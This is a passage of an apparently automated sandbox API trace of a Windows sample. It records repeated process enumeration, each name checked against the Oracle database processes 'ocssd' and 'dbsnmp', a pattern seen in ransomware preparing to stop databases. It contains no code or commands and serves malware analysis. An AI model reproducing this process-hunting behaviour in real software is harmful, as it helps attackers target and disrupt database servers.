(lpFirst="saying.exe", lpSrch="ocssd") returned 0x0 [0092.825] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0092.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.826] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543958 [0092.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3543958, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0092.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0092.826] StrStrIA (lpFirst="ripe.exe", lpSrch="ocssd") returned 0x0 [0092.826] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0092.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.827] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543a90 [0092.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3543a90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0092.827] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0092.827] StrStrIA (lpFirst="acoustic.exe", lpSrch="ocssd") returned 0x0 [0092.827] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0092.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.828] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35439e8 [0092.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x35439e8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0092.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0092.829] StrStrIA (lpFirst="mail.exe", lpSrch="ocssd") returned 0x0 [0092.829] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.830] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543aa8 [0092.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3543aa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0092.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0092.830] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="ocssd") returned 0x0 [0092.830] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.831] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543ad8 [0092.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.831] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.831] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0092.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.833] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543928 [0092.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3543928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.833] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0092.833] StrStrIA (lpFirst="dllhost.exe", lpSrch="ocssd") returned 0x0 [0092.833] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.834] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35438e0 [0092.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35438e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.834] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocssd") returned 0x0 [0092.834] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0092.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.835] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35438f8 [0092.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35438f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0092.835] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0092.835] StrStrIA (lpFirst="UsoClient.exe", lpSrch="ocssd") returned 0x0 [0092.835] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.837] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543b50 [0092.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3543b50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.837] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocssd") returned 0x0 [0092.837] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0092.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0092.838] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3543418 [0092.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3543418, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0092.838] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0092.838] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="ocssd") returned 0x0 [0092.838] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0092.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.839] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3543218 [0092.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3543218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0092.839] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0092.839] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="ocssd") returned 0x0 [0092.839] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0092.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.840] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566700 [0092.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x3566700, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0092.840] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0092.840] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="ocssd") returned 0x0 [0092.840] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.842] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543b98 [0092.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3543b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.842] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0092.842] StrStrIA (lpFirst="conhost.exe", lpSrch="ocssd") returned 0x0 [0092.842] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.843] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543970 [0092.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3543970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.843] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0092.843] StrStrIA (lpFirst="conhost.exe", lpSrch="ocssd") returned 0x0 [0092.843] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.844] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543910 [0092.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.844] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.844] StrStrIA (lpFirst="svchost.exe", lpSrch="ocssd") returned 0x0 [0092.844] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0092.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.845] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543af0 [0092.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3543af0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0092.845] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0092.845] StrStrIA (lpFirst="rxodge.exe", lpSrch="ocssd") returned 0x0 [0092.845] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0092.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.846] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543a60 [0092.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3543a60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0092.846] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0092.846] StrStrIA (lpFirst="sppsvc.exe", lpSrch="ocssd") returned 0x0 [0092.846] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0092.847] CloseHandle (hObject=0x358) returned 1 [0092.847] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0092.861] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.863] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3543538 [0092.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3543538, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0092.863] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0092.863] StrStrIA (lpFirst="[System Process]", lpSrch="dbsnmp") returned 0x0 [0092.863] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0092.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.864] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547878 [0092.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547878, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0092.864] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0092.864] StrStrIA (lpFirst="System", lpSrch="dbsnmp") returned 0x0 [0092.864] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0092.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.866] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3543988 [0092.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3543988, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0092.866] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0092.866] StrStrIA (lpFirst="smss.exe", lpSrch="dbsnmp") returned 0x0 [0092.866] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.867] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35438b0 [0092.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35438b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0092.867] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0092.867] StrStrIA (lpFirst="csrss.exe", lpSrch="dbsnmp") returned 0x0 [0092.867] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0092.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.868] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543ac0 [0092.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3543ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0092.868] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0092.868] StrStrIA (lpFirst="wininit.exe", lpSrch="dbsnmp") returned 0x0 [0092.868] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.869] LocalAlloc (uFlags=0x40, uBytes=0xa) 